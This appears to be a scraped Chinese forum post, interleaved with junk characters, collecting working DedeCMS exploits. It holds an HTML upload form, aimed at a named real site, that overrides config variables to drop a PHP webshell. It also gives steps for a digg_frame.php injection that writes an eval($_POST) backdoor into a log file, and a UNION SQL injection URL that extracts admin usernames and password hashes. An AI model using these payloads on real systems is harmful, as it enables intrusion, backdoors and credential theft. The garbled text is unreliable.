. _! ^0 m& O) m! B</head>' {' n% z6 H& [: \4 M9 s( }$ S9 P
<body style="FONT-SIZE: 9pt">0 |0 V. R5 d* k2 Z9 Z7 O4 Q0 r0 g
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. \: x# m, [3 u7 N
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% S/ C6 p5 F8 S% b+ y8 a. ^<input type='hidden' name='activepath' value='/data/cache/' />
4 J7 p5 M( V+ D* i3 z& h/ }<input type='hidden' name='cfg_basedir' value='../../' />" {$ E1 E% O# a0 ^8 `
<input type='hidden' name='cfg_imgtype' value='php' />
& |( ^6 C# W: E' A) Z<input type='hidden' name='cfg_not_allowall' value='txt' />; D c) ]2 {% e& i
<input type='hidden' name='cfg_softtype' value='php' />
8 Y0 D/ r! j6 G( S0 W( ^ F<input type='hidden' name='cfg_mediatype' value='php' />- X/ Y: u1 I8 H% I
<input type='hidden' name='f' value='form1.enclosure' />
# b! q8 r# F, Y8 Y# z<input type='hidden' name='job' value='upload' />
: j% b/ V3 x8 C# ~/ h3 u& G( n<input type='hidden' name='newname' value='fly.php' />& s1 L1 x: P: P+ P
Select U Shell <input type='file' name='uploadfile' size='25' />: h8 t$ {8 y' r: `+ {2 J+ l) ]
<input type='submit' name='sb1' value='确定' />) m! o6 ~7 M9 G% |- T
</form>
6 t! D3 |0 C, |: T* W<br />It's just a exp for the bug of Dedecms V55...<br />
+ l7 |4 f: P U/ y; e4 INeed register_globals = on...<br />3 q5 f, H; Z! c: P9 q' `" }; J
Fun the game,get a webshell at /data/cache/fly.php...<br />6 F* V! ]5 V; a E: ?3 m
</body>
2 d4 q% E/ B+ a) I) ?' H</html> s* \* y3 S" V7 P: I. k
& k6 C# }2 s3 X9 b0 D) p. |
5 R5 [* X2 P# l/ V
5 t" d( Y* n$ D; J' q( l( r& H+ |: D K
- b4 {& Z: j2 \ B7 \6 Q0 ~, t1 W( K E
, e1 A7 b- C$ f0 _0 l( c% B) T# Y9 @
& {0 V; E. i# A# J
; j6 c/ V, z! `7 |0 U- p1 s织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞& L# E4 q5 e1 H1 |
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
. y1 L. G! K/ _' d' M6 V4 Z1. 访问网址:
D( q1 ^( ~9 v. a0 t6 L. ihttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>$ @8 Q f7 W1 N9 n9 T4 S
可看见错误信息
9 Q+ \$ Y f5 x4 Z4 |# d, n9 _3 E6 q! K- o1 Y6 B
0 W# c+ L. f7 K* @( x" a
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
' E+ f }/ b" G: l2 m' ]3 Rint(3) Error: Illegal double '1024e1024' value found during parsing4 a7 _$ m' X& b }/ s
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>" `% c U5 z4 e" m# |* Q+ H# b
2 r" a6 k3 V# z! P% G; Q8 J0 _# H2 `/ q* Q: {9 E
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
! H! |( g6 l1 r4 t+ V7 t& F% g; r
6 f! p- O% e' L5 s% G<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>( o1 s" x/ q. g+ H4 ]# U7 `: r
: `5 t6 V0 ~0 @7 o% a5 o: `" E
按确定后的看到第2步骤的信息表示文件木马上传成功.
; k" s* h( a, W! e1 o3 C5 }5 C0 R' o8 `7 F6 K' z
) R: {1 B$ D3 r4 E! e0 _
; M, K' Q3 z0 Z ^6 s$ c. j
% m m8 V7 Y3 u" v
2 d+ L9 z) D6 l3 n$ j
/ ^3 Q/ {. A6 X/ y3 z- m+ I- a! p3 ^8 d
4 |2 u# g R7 n1 s) {
. b4 G3 M0 F& E) s2 @' g7 |: n. P5 J+ F- d* G; [$ \6 |7 l
1 K- Z3 K8 n% ?9 ^( e
- `1 ]$ ^3 a6 Y3 ~. w
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
) Q0 J- e& e( p$ D) Ehttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
分享
支持
反对